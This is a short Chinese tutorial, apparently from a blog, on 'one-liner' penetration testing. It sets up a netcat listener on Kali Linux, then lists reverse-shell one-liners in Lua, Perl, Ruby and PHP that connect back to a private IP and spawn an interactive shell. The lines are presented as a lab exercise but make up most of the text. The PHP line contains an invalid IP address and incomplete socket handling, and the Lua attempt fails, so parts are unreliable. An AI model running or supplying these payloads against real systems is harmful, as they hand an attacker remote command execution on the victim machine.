渗透测试（一句话）篇

渗透测试首先要搞定虚拟机和环境问题，虚拟机就不在赘述，网上很多，我也写过，环境的查看方法是win+R，呼出指令面板，输入cmd，打开命令提示符。

 输入各种环境查询，如果没有，就像这样。

 如果有，就像这样

 然后就可以执行各种测试

具体的实验建议分别在一台kali Linux 和一台  C/Linux上做，最好用远程监听工具

                                  我推荐这款                                               无网络，不实验哦

在kali Linux上监听端口命令：nc -lvvp 1111

（端口自己随便改，有不冲突就行）

就像这样

然后在C/Linux上输入各种代码

 lua -e "require('socket');require('os');t=socket.tcp();t:connect('192.168.227.129','1111');os.execute('/bin/sh -i <&3 >&3 2>&3');"
lua: (command line):1: module 'socket' not found:

反馈：

 perl -e '
use Socket;
$i="192.168.227.129";
$p=1111;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");
open(STDOUT,">&S");open(STDERR,">&S");
exec("/bin/sh -i");};'

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.227.129","1111");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

php -r '$sock=fsockopen("192.168.277.129",1111);exec("/bin/bash -i <&3 >&3 2>&3");'

诸如此类，反馈也不尽相同

 链接成功，这就是初步的渗透测试。